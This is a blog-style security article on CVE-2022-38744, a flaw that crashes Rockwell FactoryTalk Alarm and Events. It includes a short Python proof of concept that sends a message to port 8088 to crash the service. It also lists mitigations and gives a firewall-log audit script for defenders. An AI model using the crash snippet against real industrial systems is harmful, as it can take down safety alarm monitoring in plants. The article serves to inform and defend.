Rockwell Automation’s FactoryTalk Alarm and Events (FTAE) is used for monitoring and managing alarms in industrial settings. It’s a key part of many critical infrastructure setups—but, as discovered in 2022, a flaw (CVE-2022-38744) allows anyone on the network to crash this service entirely, with no login required.
In this article, I’ll explain what this vulnerability is, how it works, its impact, and offer some example code for security researchers and defenders. Everything here is written simply and exclusively for this guide.
What Is CVE-2022-38744?
CVE-2022-38744 is an unauthenticated Denial of Service (DoS) vulnerability in Rockwell’s FactoryTalk Alarm and Events Service (FTAE). An attacker with network access to the FTAE service can send a crafted message, or even just open an empty connection, to a specific port. When the server receives it, it faults (crashes) and is no longer available, meaning alarms can’t be monitored until the service is restarted.
How Does the Attack Work?
The FTAE server exposes a TCP port that is often used for “pings”, a quick way to check whether the service is alive. This port expects messages in an XML format. The vulnerability lies in how FTAE handles these incoming XML messages, or even the bare network connection itself: the service attempts to process the input, fails, and crashes.
That’s it. After this, FTAE is offline until it is manually brought back up.
Example Exploit Code
Here’s a simple Python snippet to demonstrate how this vulnerability could be triggered. Use legally and only in a lab environment!
```python
import socket

target_ip = '192.168.1.10'  # Change to the target FTAE server IP
target_port = 8088          # Default FTAE port; change if needed

# Example, maliciously malformed minimal XML message
xml_payload = b'<ping></ping>'

# Open a TCP connection to the FTAE port and send the message
with socket.create_connection((target_ip, target_port), timeout=5) as s:
    s.sendall(xml_payload)

print("Sent message—service should now be checked for crash.")
```
Note: In some setups, even establishing the connection and sending zero bytes can cause the crash.
Impact: Why Is This a Big Deal?
If an attacker (or any user) can shut down alarm monitoring in a factory or power plant, it could lead to safety incidents or process failures. Even if no damage occurs, downtime can cost millions for large plants.
Since authentication isn’t needed, anyone on the network can do this—if, for example, they connect via WiFi, VPN, or a poorly segmented network. The biggest risk is from insiders or attackers who have already breached the IT network.
Mitigation
- Update to the latest patches for FactoryTalk Alarm and Events.
- Restrict network access to the affected port (default is 8088/TCP) using firewalls or VLANs.
- Use proper network segmentation so only trusted systems can reach FTAE ports.
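Restricting the port and segmenting the network only help if you can also see who is actually reaching 8088/TCP. The script below is an added example, not code from the original article or from Rockwell: it audits Windows Firewall log lines (pfirewall.log layout) for connections to the FTAE port, flags allowed connections from hosts outside an allowlist of trusted subnets, and separately counts dropped attempts. The log lines are constructed for the example, and the trusted subnets and the FTAE server address are hypothetical. Because the article notes that even an empty connection can fault the service, availability monitoring should watch the Windows service state rather than probing the port itself.

```python
"""Audit firewall log lines for access to the FTAE port (8088/TCP by default).

Added example for this article; it is not Rockwell's code. Sample log lines
are constructed, and the trusted subnets / server address are hypothetical.
"""
import ipaddress
from collections import Counter

FTAE_PORT = 8088  # default FTAE port named in the mitigation list

# Hypothetical allowlist: engineering workstation VLAN and HMI segment.
TRUSTED_NETWORKS = [
    ipaddress.ip_network("10.10.20.0/24"),
    ipaddress.ip_network("10.10.30.0/24"),
]

# Constructed lines in Windows Firewall (pfirewall.log) layout:
# date time action protocol src-ip dst-ip src-port dst-port ...
SAMPLE_LOG = """\
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2022-10-27 14:15:01 ALLOW TCP 10.10.20.15 10.10.10.5 51234 8088 0 - 0 0 0 - - - RECEIVE
2022-10-27 14:15:02 ALLOW TCP 10.10.20.15 10.10.10.5 51235 443 0 - 0 0 0 - - - RECEIVE
2022-10-27 14:15:07 ALLOW TCP 172.16.99.8 10.10.10.5 40001 8088 0 - 0 0 0 - - - RECEIVE
2022-10-27 14:15:07 ALLOW TCP 172.16.99.8 10.10.10.5 40002 8088 0 - 0 0 0 - - - RECEIVE
2022-10-27 14:15:09 DROP TCP 192.168.50.3 10.10.10.5 33000 8088 0 - 0 0 0 - - - RECEIVE
"""


def parse_line(line):
    """Return (action, protocol, src_ip, dst_port), or None for header/blank/bad lines."""
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    if len(fields) < 8:
        return None
    try:
        return fields[2], fields[3], ipaddress.ip_address(fields[4]), int(fields[7])
    except ValueError:
        return None


def is_trusted(ip):
    """True when the source address lies inside one of the allowlisted subnets."""
    return any(ip in net for net in TRUSTED_NETWORKS)


def audit_ftae_access(log_text, port=FTAE_PORT):
    """Summarise TCP traffic to `port`.

    Returns a dict with two counters keyed by source address:
      allowed_untrusted - connections the firewall ALLOWED from non-allowlisted hosts
                          (a segmentation gap: these hosts can reach the FTAE port)
      dropped           - connections the firewall DROPPED (blocked, but someone tried)
    """
    allowed_untrusted, dropped = Counter(), Counter()
    for raw in log_text.splitlines():
        rec = parse_line(raw.strip())
        if rec is None:
            continue
        action, proto, src, dst_port = rec
        if proto != "TCP" or dst_port != port:
            continue
        if action == "ALLOW" and not is_trusted(src):
            allowed_untrusted[str(src)] += 1
        elif action == "DROP":
            dropped[str(src)] += 1
    return {"allowed_untrusted": dict(allowed_untrusted), "dropped": dict(dropped)}


if __name__ == "__main__":
    report = audit_ftae_access(SAMPLE_LOG)
    for src, n in report["allowed_untrusted"].items():
        print(f"ALERT: {n} allowed connection(s) to {FTAE_PORT}/tcp from untrusted host {src}")
    for src, n in report["dropped"].items():
        print(f"INFO: {n} blocked attempt(s) on {FTAE_PORT}/tcp from {src}")
```

On the constructed sample the trusted engineering host (10.10.20.15) is ignored, 172.16.99.8 is reported as an untrusted host that the firewall let through twice, and 192.168.50.3 shows up as a blocked attempt. Any entry under allowed_untrusted means the firewall or VLAN rules from the list above are not actually confining the port yet.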
References:
- Rockwell Automation Security Advisory
- CISA Advisory
Closing Thoughts
CVE-2022-38744 is a reminder that industrial software isn’t immune to classic mistakes—like not handling input well on a public port. A single message on the wire can take down your alarms if you haven’t patched and secured your network.
If you use Rockwell FTAE, check your setup and patch as soon as possible. And remember: in OT networks, service denials aren’t just annoying—they can be dangerous.
Stay safe, stay patched!
*This article is exclusive. For further questions, reach out or see the official Rockwell and CISA links above for more detail.*
Timeline
Published on: 10/27/2022 14:15:00 UTC
Last modified on: 10/31/2022 13:21:00 UTC